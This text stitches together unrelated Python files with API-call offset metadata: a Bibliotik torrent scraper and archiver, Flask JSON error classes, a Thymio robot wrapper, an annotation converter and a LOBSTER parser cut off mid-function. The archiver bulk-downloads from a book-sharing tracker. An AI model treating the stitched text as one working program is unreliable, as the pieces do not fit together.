        s1 = np.dot(xmap_masked, xmap_masked)
        scaling_factor = s2 / s1
        k = model_masked_mean - scaling_factor * xmap_masked_mean
        logger.info(f"L2 scaling: S = {scaling_factor:.2f}\tk = {k:.2f}")
        # Scale the observed map to the calculated map
        self.xmap.array = scaling_factor * self.xmap.array + k
        transformer.reset(full=True)

    def cutoff(self, cutoff_value, value=-1):
        """Clamp the map: set all values below `cutoff_value` to `value`."""
        cutoff_mask = self.xmap.array < cutoff_value
        self.xmap.array[cutoff_mask] = value
        logger.info(f"Map absolute cutoff value: {cutoff_value:.2f}")
| [
"logging.getLogger",
"numpy.dot"
] | [((99, 126), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (116, 126), False, 'import logging\n'), ((1942, 1975), 'numpy.dot', 'np.dot', (['model_masked', 'xmap_masked'], {}), '(model_masked, xmap_masked)\n', (1948, 1975), True, 'import numpy as np\n'), ((1989, 2021), 'numpy.dot', 'np.dot', (['xmap_masked', 'xmap_masked'], {}), '(xmap_masked, xmap_masked)\n', (1995, 2021), True, 'import numpy as np\n')] |
import time
from django.conf import settings
from Harvest.utils import get_logger
from monitoring.decorators import update_component_status
from monitoring.models import ComponentStatus
from plugins.bibliotik.client import BibliotikClient
from plugins.bibliotik.exceptions import BibliotikTorrentNotFoundException
from plugins.bibliotik.html_parser import parse_search_results
from plugins.bibliotik.tracker import BibliotikTrackerPlugin
from plugins.bibliotik_archiver.models import BibliotikArchiverState
from plugins.bibliotik_archiver.utils import get_bibliotik_torrent_for_archiving
from task_queue.task_queue import TaskQueue
from torrents.add_torrent import fetch_torrent, add_torrent_from_tracker
from torrents.models import Realm
from trackers.registry import TrackerRegistry
logger = get_logger(__name__)
@TaskQueue.periodic_task(settings.BIBLIOTIK_ARCHIVER_METADATA_INTERVAL)
@update_component_status(
    'bibliotik_archiver_metadata',
    error_message='Bibliotik archiver metadata crashed.',
)
def bibliotik_archiver_metadata():
    """Periodic task: scrape Bibliotik torrent metadata sequentially by id,
    resuming from the last archived id and stopping before the next run."""
    start = time.time()
    state = BibliotikArchiverState.objects.get()
    if not state.is_metadata_enabled:
        return
    client = BibliotikClient()
    tracker = TrackerRegistry.get_plugin(BibliotikTrackerPlugin.name, 'bibliotik_archiver_metadata')
    realm = Realm.objects.get(name=tracker.name)
    # NOTE(review): assumes an empty search lists the newest torrent first,
    # so the first result carries the current maximum tracker id — confirm.
    search_results = parse_search_results(client.search(''))
    max_tracker_id = search_results[0]['tracker_id']
    logger.info('Bibliotik max tracker id: {}.', max_tracker_id)
    num_scraped = 0
    # last_meta_tracker_id was the last one processed, so resume from the next.
    for tracker_id in range(state.last_meta_tracker_id + 1, max_tracker_id + 1):
        try:
            fetch_torrent(realm, tracker, tracker_id)
            logger.info('Bibliotik torrent {} fetched.', tracker_id)
        except BibliotikTorrentNotFoundException:
            # Gaps in the id sequence are expected (deleted torrents);
            # record progress and keep going.
            logger.info('Bibliotik torrent {} not found.', tracker_id)
        state.last_meta_tracker_id = tracker_id
        state.save(update_fields=('last_meta_tracker_id',))
        num_scraped += 1
        # Stop early so the whole run (including the final sleep) fits
        # inside the scheduling interval, with a 4 s safety margin.
        allowed_time = (
            settings.BIBLIOTIK_ARCHIVER_METADATA_INTERVAL -
            settings.BIBLIOTIK_ARCHIVER_METADATA_SLEEP -
            4
        )
        if time.time() - start >= allowed_time:
            break
        # Throttle requests to the tracker.
        time.sleep(settings.BIBLIOTIK_ARCHIVER_METADATA_SLEEP)
    time_taken = time.time() - start
    ComponentStatus.update_status(
        'bibliotik_archiver_metadata',
        ComponentStatus.STATUS_GREEN,
        'Completed Bibliotik archiver metadata run with {} torrents in {:.3f} s. Progress: {} / {}.'.format(
            num_scraped, time_taken, state.last_meta_tracker_id, max_tracker_id),
    )
@TaskQueue.periodic_task(settings.BIBLIOTIK_ARCHIVER_DOWNLOAD_INTERVAL)
@update_component_status(
    'bibliotik_archiver_download',
    error_message='Bibliotik archiver download torrent crashed.',
)
def bibliotik_archiver_download_torrent():
    """Periodic task: pick one Bibliotik torrent queued for archiving and
    add it to the download client. Returns early (no-op) when disabled,
    when nothing is queued, or when no download location is configured."""
    start = time.time()
    state = BibliotikArchiverState.objects.get()
    if not state.is_download_enabled:
        return
    bibliotik_torrent, num_remaining = get_bibliotik_torrent_for_archiving()
    if not bibliotik_torrent:
        logger.info('Bibliotik torrent download - nothing to download.')
        return
    tracker = TrackerRegistry.get_plugin('bibliotik', 'bibliotik_archive_download_torrent')
    realm = Realm.objects.get(name=tracker.name)
    download_location = realm.get_preferred_download_location()
    if not download_location:
        logger.error('No download location for realm {}.', tracker.name)
        return
    tracker_id = bibliotik_torrent.torrent_info.tracker_id
    # Refresh metadata first: the torrent may have been deleted upstream
    # since it was queued.
    torrent_info = fetch_torrent(realm, tracker, tracker_id)
    if torrent_info.is_deleted:
        logger.info('Bibliotik torrent {} already deleted.', tracker_id)
        return
    logger.info('Downloading Bibliotik torrent {}.', tracker_id)
    add_torrent_from_tracker(
        tracker=tracker,
        tracker_id=tracker_id,
        download_path_pattern=download_location.pattern,
        force_fetch=False,
    )
    time_taken = time.time() - start
    ComponentStatus.update_status(
        'bibliotik_archiver_download',
        ComponentStatus.STATUS_GREEN,
        'Completed Bibliotik archiver download torrent run in {:.3f} s. Remaining: {}.'.format(
            time_taken, num_remaining - 1),
    )
| [
"plugins.bibliotik_archiver.utils.get_bibliotik_torrent_for_archiving",
"torrents.add_torrent.add_torrent_from_tracker",
"torrents.models.Realm.objects.get",
"plugins.bibliotik_archiver.models.BibliotikArchiverState.objects.get",
"task_queue.task_queue.TaskQueue.periodic_task",
"monitoring.decorators.upda... | [((797, 817), 'Harvest.utils.get_logger', 'get_logger', (['__name__'], {}), '(__name__)\n', (807, 817), False, 'from Harvest.utils import get_logger\n'), ((821, 891), 'task_queue.task_queue.TaskQueue.periodic_task', 'TaskQueue.periodic_task', (['settings.BIBLIOTIK_ARCHIVER_METADATA_INTERVAL'], {}), '(settings.BIBLIOTIK_ARCHIVER_METADATA_INTERVAL)\n', (844, 891), False, 'from task_queue.task_queue import TaskQueue\n'), ((893, 1006), 'monitoring.decorators.update_component_status', 'update_component_status', (['"""bibliotik_archiver_metadata"""'], {'error_message': '"""Bibliotik archiver metadata crashed."""'}), "('bibliotik_archiver_metadata', error_message=\n 'Bibliotik archiver metadata crashed.')\n", (916, 1006), False, 'from monitoring.decorators import update_component_status\n'), ((2767, 2837), 'task_queue.task_queue.TaskQueue.periodic_task', 'TaskQueue.periodic_task', (['settings.BIBLIOTIK_ARCHIVER_DOWNLOAD_INTERVAL'], {}), '(settings.BIBLIOTIK_ARCHIVER_DOWNLOAD_INTERVAL)\n', (2790, 2837), False, 'from task_queue.task_queue import TaskQueue\n'), ((2839, 2960), 'monitoring.decorators.update_component_status', 'update_component_status', (['"""bibliotik_archiver_download"""'], {'error_message': '"""Bibliotik archiver download torrent crashed."""'}), "('bibliotik_archiver_download', error_message=\n 'Bibliotik archiver download torrent crashed.')\n", (2862, 2960), False, 'from monitoring.decorators import update_component_status\n'), ((1060, 1071), 'time.time', 'time.time', ([], {}), '()\n', (1069, 1071), False, 'import time\n'), ((1085, 1121), 'plugins.bibliotik_archiver.models.BibliotikArchiverState.objects.get', 'BibliotikArchiverState.objects.get', ([], {}), '()\n', (1119, 1121), False, 'from plugins.bibliotik_archiver.models import BibliotikArchiverState\n'), ((1189, 1206), 'plugins.bibliotik.client.BibliotikClient', 'BibliotikClient', ([], {}), '()\n', (1204, 1206), False, 'from plugins.bibliotik.client import 
BibliotikClient\n'), ((1221, 1311), 'trackers.registry.TrackerRegistry.get_plugin', 'TrackerRegistry.get_plugin', (['BibliotikTrackerPlugin.name', '"""bibliotik_archiver_metadata"""'], {}), "(BibliotikTrackerPlugin.name,\n 'bibliotik_archiver_metadata')\n", (1247, 1311), False, 'from trackers.registry import TrackerRegistry\n'), ((1320, 1356), 'torrents.models.Realm.objects.get', 'Realm.objects.get', ([], {'name': 'tracker.name'}), '(name=tracker.name)\n', (1337, 1356), False, 'from torrents.models import Realm\n'), ((3022, 3033), 'time.time', 'time.time', ([], {}), '()\n', (3031, 3033), False, 'import time\n'), ((3047, 3083), 'plugins.bibliotik_archiver.models.BibliotikArchiverState.objects.get', 'BibliotikArchiverState.objects.get', ([], {}), '()\n', (3081, 3083), False, 'from plugins.bibliotik_archiver.models import BibliotikArchiverState\n'), ((3177, 3214), 'plugins.bibliotik_archiver.utils.get_bibliotik_torrent_for_archiving', 'get_bibliotik_torrent_for_archiving', ([], {}), '()\n', (3212, 3214), False, 'from plugins.bibliotik_archiver.utils import get_bibliotik_torrent_for_archiving\n'), ((3349, 3426), 'trackers.registry.TrackerRegistry.get_plugin', 'TrackerRegistry.get_plugin', (['"""bibliotik"""', '"""bibliotik_archive_download_torrent"""'], {}), "('bibliotik', 'bibliotik_archive_download_torrent')\n", (3375, 3426), False, 'from trackers.registry import TrackerRegistry\n'), ((3439, 3475), 'torrents.models.Realm.objects.get', 'Realm.objects.get', ([], {'name': 'tracker.name'}), '(name=tracker.name)\n', (3456, 3475), False, 'from torrents.models import Realm\n'), ((3738, 3779), 'torrents.add_torrent.fetch_torrent', 'fetch_torrent', (['realm', 'tracker', 'tracker_id'], {}), '(realm, tracker, tracker_id)\n', (3751, 3779), False, 'from torrents.add_torrent import fetch_torrent, add_torrent_from_tracker\n'), ((3970, 4106), 'torrents.add_torrent.add_torrent_from_tracker', 'add_torrent_from_tracker', ([], {'tracker': 'tracker', 'tracker_id': 'tracker_id', 
'download_path_pattern': 'download_location.pattern', 'force_fetch': '(False)'}), '(tracker=tracker, tracker_id=tracker_id,\n download_path_pattern=download_location.pattern, force_fetch=False)\n', (3994, 4106), False, 'from torrents.add_torrent import fetch_torrent, add_torrent_from_tracker\n'), ((2362, 2416), 'time.sleep', 'time.sleep', (['settings.BIBLIOTIK_ARCHIVER_METADATA_SLEEP'], {}), '(settings.BIBLIOTIK_ARCHIVER_METADATA_SLEEP)\n', (2372, 2416), False, 'import time\n'), ((2435, 2446), 'time.time', 'time.time', ([], {}), '()\n', (2444, 2446), False, 'import time\n'), ((4160, 4171), 'time.time', 'time.time', ([], {}), '()\n', (4169, 4171), False, 'import time\n'), ((1744, 1785), 'torrents.add_torrent.fetch_torrent', 'fetch_torrent', (['realm', 'tracker', 'tracker_id'], {}), '(realm, tracker, tracker_id)\n', (1757, 1785), False, 'from torrents.add_torrent import fetch_torrent, add_torrent_from_tracker\n'), ((2299, 2310), 'time.time', 'time.time', ([], {}), '()\n', (2308, 2310), False, 'import time\n')] |
from flask import request,json
from werkzeug.exceptions import HTTPException
class ApiException(HTTPException):
    """Base class for JSON API errors.

    Overrides werkzeug's HTML error rendering: the response body is a JSON
    object with `msg`, `error_code`, and the request line.
    """
    code = 500        # HTTP status code of the response
    error_code = 500  # application-level error code echoed in the body
    msg = 'sorry, made a mistake'

    def __init__(self,code=None, error_code=None, msg=None, header=None):
        # Only override class-level defaults when a truthy value was given.
        # NOTE(review): the `header` argument is accepted but never used.
        if code:
            self.code = code
        if msg:
            self.msg = msg
        if error_code:
            self.error_code = error_code
        super(ApiException,self).__init__(msg,None)

    def get_body(self, environ=None):
        """Build the JSON response body string."""
        body=dict(
            msg=self.msg,
            error_code = self.error_code,
            request=request.method + ' ' + self.get_url_no_param()
        )
        text = json.dumps(body)
        return text

    def get_headers(self, environ=None):
        # Force a JSON content type on the error response.
        return [('Content-Type','application/json')]

    @staticmethod
    def get_url_no_param():
        """Return the request path with the query string stripped."""
        full_url = str(request.full_path)
        main_path = full_url.split('?')
        return main_path[0]
class ParameterException(ApiException):
    """*400* raised when request parameters fail validation."""
    code = 400
    error_code = 400
    msg = 'invalid parameter'
class BadRequest(ApiException):
    """*400* `Bad Request`
    Raise if the browser sends something to the application the application
    or server cannot handle.
    """
    # error_code mirrors the HTTP status, as for the other subclasses.
    code = 400
    error_code = 400
    msg = 'The browser (or proxy) sent a request that this server could not understand.'
class Success(ApiException):
    # Not an error: reuses the exception machinery to emit a 200 JSON body.
    code = 200
    msg = 'success'
class ClientDisconnected(BadRequest):
    """Internal exception that is raised if Werkzeug detects a disconnected
    client.  Since the client is already gone at that point attempting to
    send the error message to the client might not work and might ultimately
    result in another exception in the server.  Mainly this is here so that
    it is silenced by default as far as Werkzeug is concerned.

    Since disconnections cannot be reliably detected and are unspecified
    by WSGI to a large extent this might or might not be raised if a client
    is gone.

    .. versionadded:: 0.8
    """
    # Marker subclass: inherits all behavior from BadRequest.
class SecurityError(BadRequest):
    """Raised if something triggers a security error.  This is otherwise
    exactly like a bad request error.

    .. versionadded:: 0.9
    """
    # Marker subclass: inherits all behavior from BadRequest.
class BadHost(BadRequest):
    """Raised if the submitted host is badly formatted.

    .. versionadded:: 0.11.2
    """
    # Marker subclass: inherits all behavior from BadRequest.
class Unauthorized(ApiException):
    """*401* `Unauthorized`
    Raise if the user is not authorized.  Also used if you want to use HTTP
    basic auth.
    """
    code = 401
    error_code = 401
    msg = (
        'The server could not verify that you are authorized to access '
        'the URL requested.  You either supplied the wrong credentials (e.g. '
        'a bad password), or your browser doesn\'t understand how to supply '
        'the credentials required.'
    )
class Forbidden(ApiException):
    """*403* `Forbidden`
    Raise if the user doesn't have the permission for the requested resource
    but was authenticated.
    """
    code = 403
    error_code = 403
    msg = (
        'You don\'t have the permission to access the requested resource. '
        'It is either read-protected or not readable by the server.'
    )
class NotFound(ApiException):
    """*404* `Not Found`
    Raise if a resource does not exist and never existed.
    """
    code = 404
    error_code = 404
    msg = (
        'The requested URL was not found on the server. '
        'If you entered the URL manually please check your spelling and '
        'try again.'
    )
class MethodNotAllowed(ApiException):
    """*405* `Method Not Allowed`
    Raise if the server used a method the resource does not handle.  For
    example `POST` if the resource is view only.  Especially useful for REST.

    The first argument for this exception should be a list of allowed methods.
    Strictly speaking the response would be invalid if you don't provide valid
    methods in the header which you can do with that list.
    """
    code = 405
    error_code = 405
    msg = 'The method is not allowed for the requested URL.'

    def __init__(self, valid_methods=None, msg=None):
        """Takes an optional list of valid http methods
        starting with werkzeug 0.3 the list will be mandatory."""
        # BUG FIX: pass msg by keyword.  The base signature is
        # __init__(self, code, error_code, msg, header), so the original
        # positional call bound the message string to `code`, clobbering
        # the 405 status with the message text.
        ApiException.__init__(self, msg=msg)
        self.valid_methods = valid_methods

    def get_headers(self, environ=None):
        """Add the Allow header listing the permitted methods (RFC 7231
        requires it on a 405 response)."""
        # environ now defaults to None, matching the base class signature.
        headers = ApiException.get_headers(self, environ)
        if self.valid_methods:
            headers.append(('Allow', ', '.join(self.valid_methods)))
        return headers
class NotAcceptable(ApiException):
    """*406* `Not Acceptable`
    Raise if the server can't return any content conforming to the
    `Accept` headers of the client.
    """
    code = 406
    error_code = 406
    msg = (
        'The resource identified by the request is only capable of '
        'generating response entities which have content characteristics '
        'not acceptable according to the accept headers sent in the '
        'request.'
    )
class RequestTimeout(ApiException):
    """*408* `Request Timeout`
    Raise to signalize a timeout.
    """
    code = 408
    error_code = 408
    msg = (
        'The server closed the network connection because the browser '
        'didn\'t finish the request within the specified time.'
    )
class UnsupportedMediaType(ApiException):
    """*415* `Unsupported Media Type`
    The status code returned if the server is unable to handle the media type
    the client transmitted.
    """
    code = 415
    error_code = 415
    # BUG FIX: define `msg`, which ApiException.get_body reads, instead of
    # `description`.  With only `description` set, the JSON body silently
    # fell back to the generic base message ('sorry, made a mistake').
    msg = (
        'The server does not support the media type transmitted in '
        'the request.'
    )
    # Keep werkzeug's attribute name as a backward-compatible alias.
    description = msg
class InternalServerError(ApiException):
    """*500* `Internal Server Error`
    Raise if an internal server error occurred.  This is a good fallback if an
    unknown error occurred in the dispatcher.
    """
    code = 500
    error_code = 500
    # BUG FIX: define `msg`, which ApiException.get_body reads, instead of
    # `description`.  With only `description` set, the JSON body silently
    # fell back to the generic base message ('sorry, made a mistake').
    msg = (
        'The server encountered an internal error and was unable to '
        'complete your request.  Either the server is overloaded or there '
        'is an error in the application.'
    )
    # Keep werkzeug's attribute name as a backward-compatible alias.
    description = msg
"flask.json.dumps"
] | [((682, 698), 'flask.json.dumps', 'json.dumps', (['body'], {}), '(body)\n', (692, 698), False, 'from flask import request, json\n')] |
from robot.thymio_robot import ThymioII
from robot.vrep_robot import VrepRobot
from aseba.aseba import Aseba
from utility.util_functions import normalize
import numpy as np
# Raw proximity-sensor reading range used for normalization in
# EvolvedRobot.t_read_prox.
T_SEN_MIN = 0
T_SEN_MAX = 4500
class EvolvedRobot(VrepRobot, ThymioII):
    """Thymio-II robot simulated in V-REP, carrying an evolved chromosome."""

    def __init__(self, name, client_id, id, op_mode, chromosome, robot_type):
        VrepRobot.__init__(self, client_id, id, op_mode, robot_type)
        ThymioII.__init__(self, name)
        self.chromosome = chromosome
        # Normalized and raw proximity-sensor readings, filled by t_read_prox.
        self.n_t_sensor_activation = np.array([])
        self.t_sensor_activation = np.array([])

    def t_read_prox(self):
        """Read the proximity sensors and return readings normalized to [0, 1]."""
        self.t_sensor_activation = np.array(
            super(EvolvedRobot, self).t_read_prox())
        # Map each raw reading from [T_SEN_MIN, T_SEN_MAX] onto [0.0, 1.0].
        self.n_t_sensor_activation = np.array(
            [normalize(xi, T_SEN_MIN, T_SEN_MAX, 0.0, 1.0) for xi in self.t_sensor_activation])
        return self.n_t_sensor_activation
| [
"numpy.array",
"robot.vrep_robot.VrepRobot.__init__",
"utility.util_functions.normalize",
"robot.thymio_robot.ThymioII.__init__"
] | [((335, 395), 'robot.vrep_robot.VrepRobot.__init__', 'VrepRobot.__init__', (['self', 'client_id', 'id', 'op_mode', 'robot_type'], {}), '(self, client_id, id, op_mode, robot_type)\n', (353, 395), False, 'from robot.vrep_robot import VrepRobot\n'), ((404, 433), 'robot.thymio_robot.ThymioII.__init__', 'ThymioII.__init__', (['self', 'name'], {}), '(self, name)\n', (421, 433), False, 'from robot.thymio_robot import ThymioII\n'), ((509, 521), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (517, 521), True, 'import numpy as np\n'), ((557, 569), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (565, 569), True, 'import numpy as np\n'), ((756, 801), 'utility.util_functions.normalize', 'normalize', (['xi', 'T_SEN_MIN', 'T_SEN_MAX', '(0.0)', '(1.0)'], {}), '(xi, T_SEN_MIN, T_SEN_MAX, 0.0, 1.0)\n', (765, 801), False, 'from utility.util_functions import normalize\n')] |
import argparse
import json
import os
# Prefer OpenCV for reading image dimensions; fall back to PIL, and fail
# with a clear message only when neither library is installed.
#
# BUG FIXES vs the original:
#  * removed the stray `Exception.Modu` statement, which raised
#    AttributeError at import time whenever cv2 WAS available;
#  * the PIL fallback now lives in its own try/except — the original had a
#    second `except ModuleNotFoundError` on the same try, which was
#    unreachable dead code, so the "install one of them" error never fired.
try:
    import cv2

    def get_image_dims(im_file):
        """Return (height, width) of the image at im_file."""
        im = cv2.imread(im_file, 0)
        im_h, im_w = im.shape
        return im_h, im_w
except ModuleNotFoundError:
    try:
        from PIL import Image

        def get_image_dims(im_file):
            """Return (height, width) of the image at im_file."""
            im = Image.open(im_file)
            im_w, im_h = im.size
            return im_h, im_w
    except ModuleNotFoundError:
        raise Exception("Either install opencv-python or PIL")
def main(data_path="", image_data_path = ""):
    """Convert Supervisely JSON annotations into Darknet-YOLO label files.

    data_path: folder containing meta.json (the class definitions).
    image_data_path: folder containing 'images' and 'annotations' subfolders;
        converted labels are written to 'annotations_darknet' next to them.
    """
    meta_json_path = os.path.join(data_path,"meta.json")
    if not os.path.isfile(meta_json_path):
        raise Exception(meta_json_path + " not found.")
    # Create .data file
    with open(meta_json_path) as f:
        classes = json.loads(f.read())
    titles = [lis["title"] for lis in classes["classes"]]
    # Map each class title to its zero-based index (the Darknet class id).
    dic_titles = dict(zip(titles, range(len(titles))))
    names = "\n".join(dic_titles.keys())
    meta_names_path = os.path.join(data_path,"meta.names")
    with open(meta_names_path, "w") as text_file:
        text_file.write(names)
    # Convert all spaces
    data_path = image_data_path
    images_path = os.path.join(data_path,"images")
    anno_path = os.path.join(data_path,"annotations")
    darknet_path = os.path.join(data_path,"annotations_darknet")
    if not os.path.isdir(darknet_path): os.mkdir(darknet_path)
    anno_paths = os.listdir(anno_path)
    anno_paths = [path for path in anno_paths if path.endswith(".json")]
    for ap in anno_paths:
        with open(os.path.join(anno_path,ap)) as f:
            tmp_dict = json.loads(f.read())
        im_file = tmp_dict["FileName"]
        rel_path = os.path.join(images_path,im_file)
        if not os.path.isfile(rel_path):
            # Skip annotations whose image is missing rather than failing.
            print("Image file not found for " + rel_path)
            continue
        im_h, im_w = get_image_dims(rel_path)
        num_anno = tmp_dict["NumOfAnno"]
        if num_anno < 1: continue
        annotations = tmp_dict["Annotations"]
        anno_str = ""
        for json_anno in annotations:
            classname = json_anno["classname"]
            classnum = str(dic_titles[classname])
            xmin, ymin, xmax, ymax = json_anno["BoundingBox"]
            # Darknet format: "class x_center y_center width height",
            # all coordinates normalized to the image dimensions.
            x_cen = ((xmax + xmin)/2) / im_w
            y_cen = ((ymax + ymin)/2) / im_h
            w = (xmax - xmin) / im_w
            h = (ymax - ymin) / im_h
            anno_str += classnum + " {:.4f} {:.4f} {:.4f} {:.4f}\n".format(x_cen, y_cen, w, h)
        darknet_anno = ap.split(".")[0]+".txt"
        with open(os.path.join(darknet_path, darknet_anno),"w") as f:
            f.write(anno_str)
        print(f"Converting: {ap} -> {darknet_anno}")
if __name__ == "__main__":
    # Command-line entry point: both paths default to the current directory.
    parser = argparse.ArgumentParser(description='Convert Supervisely format to Darknet-Yolo format')
    parser.add_argument('-mp','--meta_path', dest="data_path", default="", metavar="path", type=str,
                        help='full or relative path to folder containing meta.json')
    parser.add_argument('-ip','--image_path', dest="image_data_path", default="", metavar="path", type=str,
                        help='full or relative path to folder containing annotations and images')
    args = parser.parse_args()
    main(data_path=args.data_path, image_data_path=args.image_data_path)
"os.listdir",
"PIL.Image.open",
"argparse.ArgumentParser",
"os.path.join",
"os.path.isfile",
"os.path.isdir",
"os.mkdir",
"cv2.imread"
] | [((486, 522), 'os.path.join', 'os.path.join', (['data_path', '"""meta.json"""'], {}), "(data_path, 'meta.json')\n", (498, 522), False, 'import os\n'), ((1047, 1080), 'os.path.join', 'os.path.join', (['data_path', '"""images"""'], {}), "(data_path, 'images')\n", (1059, 1080), False, 'import os\n'), ((1093, 1131), 'os.path.join', 'os.path.join', (['data_path', '"""annotations"""'], {}), "(data_path, 'annotations')\n", (1105, 1131), False, 'import os\n'), ((1147, 1193), 'os.path.join', 'os.path.join', (['data_path', '"""annotations_darknet"""'], {}), "(data_path, 'annotations_darknet')\n", (1159, 1193), False, 'import os\n'), ((1268, 1289), 'os.listdir', 'os.listdir', (['anno_path'], {}), '(anno_path)\n', (1278, 1289), False, 'import os\n'), ((2415, 2508), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Convert Supervisely format to Darknet-Yolo format"""'}), "(description=\n 'Convert Supervisely format to Darknet-Yolo format')\n", (2438, 2508), False, 'import argparse\n'), ((92, 114), 'cv2.imread', 'cv2.imread', (['im_file', '(0)'], {}), '(im_file, 0)\n', (102, 114), False, 'import cv2\n'), ((530, 560), 'os.path.isfile', 'os.path.isfile', (['meta_json_path'], {}), '(meta_json_path)\n', (544, 560), False, 'import os\n'), ((869, 906), 'os.path.join', 'os.path.join', (['data_path', '"""meta.names"""'], {}), "(data_path, 'meta.names')\n", (881, 906), False, 'import os\n'), ((1201, 1228), 'os.path.isdir', 'os.path.isdir', (['darknet_path'], {}), '(darknet_path)\n', (1214, 1228), False, 'import os\n'), ((1230, 1252), 'os.mkdir', 'os.mkdir', (['darknet_path'], {}), '(darknet_path)\n', (1238, 1252), False, 'import os\n'), ((268, 287), 'PIL.Image.open', 'Image.open', (['im_file'], {}), '(im_file)\n', (278, 287), False, 'from PIL import Image\n'), ((1514, 1548), 'os.path.join', 'os.path.join', (['images_path', 'im_file'], {}), '(images_path, im_file)\n', (1526, 1548), False, 'import os\n'), ((1396, 1423), 'os.path.join', 'os.path.join', 
(['anno_path', 'ap'], {}), '(anno_path, ap)\n', (1408, 1423), False, 'import os\n'), ((1558, 1582), 'os.path.isfile', 'os.path.isfile', (['rel_path'], {}), '(rel_path)\n', (1572, 1582), False, 'import os\n'), ((2255, 2295), 'os.path.join', 'os.path.join', (['darknet_path', 'darknet_anno'], {}), '(darknet_path, darknet_anno)\n', (2267, 2295), False, 'import os\n')] |
#
# Copyright The NOMAD Authors.
#
# This file is part of NOMAD. See https://nomad-lab.eu for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import numpy as np
import ase.io
from os import path
from nomad.datamodel import EntryArchive
from nomad.units import ureg as units
from nomad.datamodel.metainfo.simulation.run import Run, Program, TimeRun
from nomad.datamodel.metainfo.simulation.system import (
System, Atoms)
from nomad.datamodel.metainfo.simulation.method import (
Method, Electronic, BasisSet)
from nomad.datamodel.metainfo.simulation.calculation import (
Calculation, Dos, DosValues, Charges)
from nomad.parsing.file_parser import TextParser, Quantity
from .metainfo.lobster import x_lobster_section_cohp, x_lobster_section_coop
'''
This is a LOBSTER code parser.
'''
# Magnitudes of the elementary charge and the electronvolt in SI base units.
e = (1 * units.e).to_base_units().magnitude
eV = (1 * units.eV).to_base_units().magnitude
def parse_ICOXPLIST(fname, scc, method):
    """Parse a LOBSTER ICOOPLIST/ICOHPLIST file into the calculation section.

    fname: path to the ICOXPLIST file; returns silently if it does not exist.
    scc: calculation section the x_lobster_section_co{o,h}p is attached to.
    method: 'o' for COOP data, 'h' for COHP data.
    """

    def icoxp_line_split(string):
        tmp = string.split()
        # LOBSTER version 3 and above
        if len(tmp) == 8:
            # fields: atom1, atom2, distance, translation vector, ICOXP
            return [tmp[1], tmp[2], float(tmp[3]), [int(tmp[4]),
                    int(tmp[5]), int(tmp[6])], float(tmp[7])]
        # LOBSTER versions below 3
        elif len(tmp) == 6:
            # fields: atom1, atom2, distance, ICOXP, number of bonds
            return [tmp[1], tmp[2], float(tmp[3]), float(tmp[4]), int(tmp[5])]

    # One 'icoxpslist_for_spin' match per spin channel; each line regex
    # alternative matches one of the two LOBSTER output layouts above.
    icoxplist_parser = TextParser(quantities=[
        Quantity('icoxpslist_for_spin', r'\s*CO[OH]P.*spin\s*\d\s*([^#]+[-\d\.]+)',
                 repeats=True,
                 sub_parser=TextParser(quantities=[
                     Quantity('line',
                              # LOBSTER version 3 and above
                              r'(\s*\d+\s+\w+\s+\w+\s+[\.\d]+\s+[-\d]+\s+[-\d]+\s+[-\d]+\s+[-\.\d]+\s*)|'
                              # LOBSTER versions below 3
                              r'(\s*\d+\s+\w+\s+\w+\s+[\.\d]+\s+[-\.\d]+\s+[\d]+\s*)',
                              repeats=True, str_operation=icoxp_line_split)])
                 )
    ])

    if not path.isfile(fname):
        return
    icoxplist_parser.mainfile = fname
    icoxplist_parser.parse()

    icoxp = []
    for spin, icoxplist in enumerate(icoxplist_parser.get('icoxpslist_for_spin')):
        lines = icoxplist.get('line')
        if lines is None:
            break
        # The 5th field distinguishes the file layouts: an int (bond count)
        # for LOBSTER < 3, a translation vector (list) for version 3+.
        if type(lines[0][4]) is int:
            a1, a2, distances, tmp, bonds = zip(*lines)
        else:
            a1, a2, distances, v, tmp = zip(*lines)
        icoxp.append(0)
        icoxp[-1] = list(tmp)
        # Pair metadata is identical for both spins; store it only once.
        if spin == 0:
            if method == 'o':
                section = scc.m_create(x_lobster_section_coop)
            elif method == 'h':
                section = scc.m_create(x_lobster_section_cohp)
            setattr(section, "x_lobster_number_of_co{}p_pairs".format(
                method), len(list(a1)))
            setattr(section, "x_lobster_co{}p_atom1_labels".format(
                method), list(a1))
            setattr(section, "x_lobster_co{}p_atom2_labels".format(
                method), list(a2))
            setattr(section, "x_lobster_co{}p_distances".format(
                method), np.array(distances) * units.angstrom)
            # version specific entries
            if 'v' in locals():
                setattr(section, "x_lobster_co{}p_translations".format(
                    method), list(v))
            if 'bonds' in locals():
                setattr(section, "x_lobster_co{}p_number_of_bonds".format(
                    method), list(bonds))
    if len(icoxp) > 0:
        setattr(section, "x_lobster_integrated_co{}p_at_fermi_level".format(
            method), np.array(icoxp) * units.eV)
def parse_COXPCAR(fname, scc, method, logger):
    """Parse a COHPCAR/COOPCAR.lobster file into the calculation section.

    fname: path to the CO{H,O}PCAR.lobster file (silently skipped if absent)
    scc: calculation section holding the x_lobster_section_co{h,o}p target
    method: 'h' for COHP quantities, 'o' for COOP quantities
    logger: logger used to report missing or malformed data

    Fix over the previous version: the integrated-values setattr was issued
    twice at the end with identical arguments; the redundant second call is
    removed.
    """
    coxpcar_parser = TextParser(quantities=[
        Quantity('coxp_pairs', r'No\.\d+:(\w{1,2}\d+)->(\w{1,2}\d+)\(([\d\.]+)\)\s*?',
                 repeats=True),
        Quantity('coxp_lines', r'\n\s*(-*\d+\.\d+(?:[ \t]+-*\d+\.\d+)+)',
                 repeats=True)
    ])
    if not path.isfile(fname):
        return
    coxpcar_parser.mainfile = fname
    coxpcar_parser.parse()
    # Reuse the section if parse_ICOXPLIST already created it.
    if method == 'o':
        if not scc.x_lobster_section_coop:
            section = scc.m_create(x_lobster_section_coop)
        else:
            section = scc.x_lobster_section_coop
    elif method == 'h':
        if not scc.x_lobster_section_cohp:
            section = scc.m_create(x_lobster_section_cohp)
        else:
